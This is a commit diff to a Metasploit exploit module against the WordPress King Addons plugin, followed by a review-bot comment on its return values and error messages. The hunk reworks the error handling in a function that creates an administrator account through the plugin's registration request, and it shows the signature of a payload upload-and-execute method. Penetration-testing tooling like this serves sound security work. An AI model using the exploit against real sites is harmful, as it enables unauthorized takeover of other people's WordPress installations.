Update modules/exploits/multi/http/wp_king_addons_privilege_escalation.rb
Co-authored-by: Phil Townes <phil_townes@rapid7.com>
committed by
GitHub
parent
17cc68df0f
commit
c423ff07c5
@@ -180,16 +180,23 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
|
||||
def create_admin_user(username, password, email)
|
||||
res = send_registration_request(username: username, email: email, password: password)
|
||||
return false unless res&.code == 200
|
||||
unless res&.code == 200
|
||||
fail_with(Failure::UnexpectedReply, 'Failed to create administrator account (HTTP error).')
|
||||
end
|
||||
|
||||
json = res.get_json_document
|
||||
return false unless json.is_a?(Hash)
|
||||
unless json.is_a?(Hash)
|
||||
fail_with(Failure::UnexpectedReply, 'Failed to create administrator account (Unexpected response.')
|
||||
end
|
||||
|
||||
return :user_exists if json['success'] == false && json.dig('data', 'message')&.match?(/already exists|username.*taken|user.*exists/i)
|
||||
return true if json['success'] == true
|
||||
if json['success'] == false && json.dig('data', 'message')&.match?(/already exists|username.*taken|user.*exists/i)
|
||||
print_warning('User already exists, attempting login with provided credentials...')
|
||||
return
|
||||
end
|
||||
|
||||
print_error("Unexpected response: #{res.body}")
|
||||
false
|
||||
return if json['success'] == true
|
||||
|
||||
fail_with(Failure::UnexpectedReply, "Unexpected response: #{res.body}")
|
||||
end
|
||||
|
||||
def upload_and_execute_payload(admin_cookie)
|
||||
|
||||
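Review bot: create_admin_user now returns nil on both the success path (`return if json['success'] == true`) and the user-already-exists path, where the removed lines returned `true` and `:user_exists`. The call sites are outside this hunk, so confirm that none of them still tests the result for truthiness or compares it with `:user_exists`; otherwise keep explicit values (`return true` / `return :user_exists`). The message on the non-Hash branch has an unbalanced parenthesis and should read `'Failed to create administrator account (Unexpected response).'`. Separately, `res&.code == 200` reports a nil response (no reply at all) as an "HTTP error" under `Failure::UnexpectedReply`; a preceding nil check that fails with `Failure::Unreachable` would make the reported reason accurate.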